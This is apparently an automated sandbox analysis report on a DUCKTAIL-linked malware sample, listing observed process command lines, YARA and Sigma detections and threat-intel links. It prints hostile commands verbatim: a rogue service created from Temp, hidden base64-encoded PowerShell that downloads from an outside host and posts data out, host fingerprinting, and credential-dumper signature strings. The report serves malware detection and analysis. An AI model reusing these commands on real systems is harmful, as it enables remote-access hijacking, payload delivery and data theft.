sc.exe (PID: 8004 cmdline: sc delete "myRdpService" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 7920 cmdline: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

net.exe (PID: 8060 cmdline: net start "myRdpService" MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)

net1.exe (PID: 7232 cmdline: C:\Windows\system32\net1 start "myRdpService" MD5: BA0BCCC6029FBBE6D8B41197F252742F)

powershell.exe (PID: 3180 cmdline: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA== MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

myRdpService.exe (PID: 5496 cmdline: C:\Windows\Temp\myRdpService.exe cakoi7 MD5: 10C767E2635167724D6A03475ED8F7A9)

regedit.exe (PID: 1364 cmdline: "regedit.exe" /e "C:\Windows\Temp\regBackup.reg" "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService" MD5: 999A30979F6195BF562068639FFC4426)

powershell.exe (PID: 6636 cmdline: "powershell.exe" -Command "systeminfo | Select-String \"OS Name\",\"OS Version\";" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

systeminfo.exe (PID: 4856 cmdline: "C:\Windows\system32\systeminfo.exe" MD5: EE309A9C61511E907D87B10EF226FDCD)

WmiPrvSE.exe (PID: 3836 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

cmd.exe (PID: 6676 cmdline: /c powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA= MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 6220 cmdline: powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA= MD5: 04029E121A0CFA5991749937DD22A1D9)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DUCKTAIL	According to Tony Lambert, this is a malware written in .NET. It was observed to be delivered using the .NET Single File deployment feature.	No Attribution	https://forensicitguy.github.io/analyzing-net-core-single-file-ducktail/ https://harfanglab.io/en/insidethelab/reverse-engineering-ida-pro-aot-net/ https://labs.withsecure.com/assets/BlogFiles/Publications/WithSecure_Research_DUCKTAIL.pdf https://labs.withsecure.com/content/dam/labs/docs/WithSecure_Research_DUCKTAIL.pdf https://securelist.com/ducktail-fashion-week/111017/	https://malpedia.caad.fkie.fraunhofer.de/details/win.ducktail

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000029.00000002.4404534772.00007FF63BCA6000.00000004.00000001.01000000.0000000B.sdmp	hacktool_windows_moyix_creddump	creddump is a python tool to extract credentials and secrets from Windows registry hives.	@mimeframe	0xdac4:$a1: !@#$%^&()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(@&% 0x11f94:$a2: 0123456789012345678901234567890123456789 0x3291c:$a3: NTPASSWORD 0x2f7b4:$a4: LMPASSWORD 0x5cd04:$a5: aad3b435b51404eeaad3b435b51404ee 0x14f54:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0
Process Memory Space: powershell.exe PID: 3620	JoeSecurity_Ducktail_12	Yara detected Ducktail	Joe Security
Process Memory Space: powershell.exe PID: 3620	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x2d03c6:$b1: ::WriteAllBytes( 0x4bb5e5:$b1: ::WriteAllBytes( 0x90c9c:$b2: ::FromBase64String( 0x911f9:$b2: ::FromBase64String( 0x91609:$b2: ::FromBase64String( 0x9181a:$b2: ::FromBase64String( 0x9192f:$b2: ::FromBase64String( 0x9199a:$b2: ::FromBase64String( 0x919fd:$b2: ::FromBase64String( 0x91a61:$b2: ::FromBase64String( 0x91abd:$b2: ::FromBase64String( 0x91b5a:$b2: ::FromBase64String( 0x91bc3:$b2: ::FromBase64String( 0x91c2b:$b2: ::FromBase64String( 0x91c91:$b2: ::FromBase64String( 0x91cf5:$b2: ::FromBase64String( 0x91d53:$b2: ::FromBase64String( 0x91dd8:$b2: ::FromBase64String( 0x91e43:$b2: ::FromBase64String( 0x91ead:$b2: ::FromBase64String( 0x91f0e:$b2: ::FromBase64String(
Process Memory Space: powershell.exe PID: 5936	JoeSecurity_Ducktail_12	Yara detected Ducktail	Joe Security
Process Memory Space: powershell.exe PID: 5936	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0xc98e6:$b1: ::WriteAllBytes( 0xb8a91:$b2: ::FromBase64String( 0xbabbe:$b2: ::FromBase64String( 0xbb972:$b2: ::FromBase64String( 0xbb9e1:$b2: ::FromBase64String( 0xc1578:$b2: ::FromBase64String( 0x115cd8:$b3: ::UTF8.GetString( 0x187a34:$s1: -join 0x189975:$s1: -join 0x236721:$s1: -join 0x2437f6:$s1: -join 0x246bc8:$s1: -join 0x24727a:$s1: -join 0x248d6b:$s1: -join 0x24af71:$s1: -join 0x24b798:$s1: -join 0x24c008:$s1: -join 0x24c743:$s1: -join 0x24c775:$s1: -join 0x24c7bd:$s1: -join 0x24c7dc:$s1: -join
Process Memory Space: svczHost.exe PID: 9708	JoeSecurity_Ducktail_6	Yara detected Ducktail	Joe Security
Process Memory Space: svczHost.exe PID: 9708	hacktool_windows_moyix_creddump	creddump is a python tool to extract credentials and secrets from Windows registry hives.	@mimeframe	0xc5736:$a1: !@#$%^&()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(@&% 0xc6e92:$a2: 0123456789012345678901234567890123456789 0xd3856:$a3: NTPASSWORD 0xd258d:$a4: LMPASSWORD 0xe5081:$a5: aad3b435b51404eeaad3b435b51404ee 0xc7d8a:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0
Process Memory Space: myRdpService.exe PID: 5496	hacktool_windows_moyix_creddump	creddump is a python tool to extract credentials and secrets from Windows registry hives.	@mimeframe	0x165b:$a1: !@#$%^&()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(@&% 0x2db7:$a2: 0123456789012345678901234567890123456789 0xf77b:$a3: NTPASSWORD 0xe4b2:$a4: LMPASSWORD 0x20fa6:$a5: aad3b435b51404eeaad3b435b51404ee 0x3caf:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
41.2.myRdpService.exe.7ff63b7a0000.0.unpack	hacktool_windows_moyix_creddump	creddump is a python tool to extract credentials and secrets from Windows registry hives.	@mimeframe	0x511cc4:$a1: !@#$%^&()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(@&% 0x516194:$a2: 0123456789012345678901234567890123456789 0x536b1c:$a3: NTPASSWORD 0x5339b4:$a4: LMPASSWORD 0x560f04:$a5: aad3b435b51404eeaad3b435b51404ee 0x519154:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0

Other

Source	Rule	Description	Author	Strings
amsi64_5936.amsi.csv	JoeSecurity_Ducktail_12	Yara detected Ducktail	Joe Security
amsi64_5936.amsi.csv	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0xfd17:$b1: ::WriteAllBytes( 0xc19b:$b2: ::FromBase64String( 0xe2c9:$b2: ::FromBase64String( 0xf07e:$b2: ::FromBase64String( 0x528:$b3: ::UTF8.GetString( 0xbdef:$s1: -join 0x238:$s4: += 0x25b:$s4: += 0x559b:$s4: += 0x565d:$s4: += 0x9884:$s4: += 0xb9a1:$s4: += 0xbc8b:$s4: += 0xbdd1:$s4: += 0xf231:$s4: += 0xf42e:$s4: += 0x116de:$s4: += 0x69abf:$s4: += 0x69b3f:$s4: += 0x69c05:$s4: += 0x69c85:$s4: +=

Sigma Signatures

System Summary

Sigma detected: PowerShell Base64 Encoded Invoke Keyword

Source: Process started

Author: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: Data: Command: powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AOQBhAGUAYQA4AGIAZgA4ADMAMwBjADgANwA3ADAAOQA1ADkAZABiADcAYwA3ADIAOABmADQAYwBjAGQAYwBmAGMAOABmADQAZQA5ADMAMABhAGYANABkAGQANAA0AGUANgA1ADIAMQAzAGIAOQBiADQAYQA0ADcAOABlADUAZgA4ADYAZABjADEAMQA5AGEAMAA4ADEAMAAxADkANABhADkAMAA4ADcANAA0ADAAYgA3ADkAMAAzADgAMgBlAGIANwAxADEANQBhADkAZAA2AGEAMwAzAGIAYwAwADIAMAAyADgAZQA1ADUANgA3ADgAYQBiAGUAMAAyAGEAZAA0ADUAZAA0ADgAZQA5AGEAZgBhADkAMwBhAGYAOAAzADcANQAzADEAZQAzADUAYgAxAGMAOAA4AGUANgBiAGYAYwBhAGYAYQAyADcAZAA4ADIAZQBlADIANAA0ADIAMAAzAGIAOAA2AGEANgA1ADAAYQBjAGYAMwAzADQANgAwADYANwA2AGUAMQA5AGUANABkADUAMABjAGMAYgBmADcAYgA3ADkANQA1ADcANQBiADQAOAAxAGUAYwA0AGQANAAzACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgB

Sigma detected: PowerShell Base64 Encoded WMI Classes

Source: Process started

Author: Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA, CommandLine: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -Execution

Sigma detected: Suspicious Encoded PowerShell Command Line

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AOQBhAGUAYQA4AGIAZgA4ADMAMwBjADgANwA3ADAAOQA1ADkAZABiADcAYwA3ADIAOABmADQAYwBjAGQAYwBmAGMAOABmADQAZQA5ADMAMABhAGYANABkAGQANAA0AGUANgA1ADIAMQAzAGIAOQBiADQAYQA0ADcAOABlADUAZgA4ADYAZABjADEAMQA5AGEAMAA4ADEAMAAxADkANABhADkAMAA4ADcANAA0ADAAYgA3ADkAMAAzADgAMgBlAGIANwAxADEANQBhADkAZAA2AGEAMwAzAGIAYwAwADIAMAAyADgAZQA1ADUANgA3ADgAYQBiAGUAMAAyAGEAZAA0ADUAZAA0ADgAZQA5AGEAZgBhADkAMwBhAGYAOAAzADcANQAzADEAZQAzADUAYgAxAGMAOAA4AGUANgBiAGYAYwBhAGYAYQAyADcAZAA4ADIAZQBlADIANAA0ADIAMAAzAGIAOAA2AGEANgA1ADAAYQBjAGYAMwAzADQANgAwADYANwA2AGUAMQA5AGUANABkADUAMABjAGMAYgBmADcAYgA3ADkANQA1ADcANQBiADQAOAAxAGUAYwA0AGQANAAzACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgB

Sigma detected: Suspicious New Service Creation

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto , CommandLine: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto , CommandLine|base64offset|contains: H, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto & net start "myRdpService", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1368, ParentProcessName: cmd.exe, ProcessCommandLine: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto , ProcessId: 7920, ProcessName: sc.exe

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AOQBhAGUAYQA4AGIAZgA4ADMAMwBjADgANwA3ADAAOQA1ADkAZABiADcAYwA3ADIAOABmADQAYwBjAGQAYwBmAGMAOABmADQAZQA5ADMAMABhAGYANABkAGQANAA0AGUANgA1ADIAMQAzAGIAOQBiADQAYQA0ADcAOABlADUAZgA4ADYAZABjADEAMQA5AGEAMAA4ADEAMAAxADkANABhADkAMAA4ADcANAA0ADAAYgA3ADkAMAAzADgAMgBlAGIANwAxADEANQBhADkAZAA2AGEAMwAzAGIAYwAwADIAMAAyADgAZQA1ADUANgA3ADgAYQBiAGUAMAAyAGEAZAA0ADUAZAA0ADgAZQA5AGEAZgBhADkAMwBhAGYAOAAzADcANQAzADEAZQAzADUAYgAxAGMAOAA4AGUANgBiAGYAYwBhAGYAYQAyADcAZAA4ADIAZQBlADIANAA0ADIAMAAzAGIAOAA2AGEANgA1ADAAYQBjAGYAMwAzADQANgAwADYANwA2AGUAMQA5AGUANABkADUAMABjAGMAYgBmADcAYgA3ADkANQA1ADcANQBiADQAOAAxAGUAYwA0AGQANAAzACIAOwANAAoAJABjAG8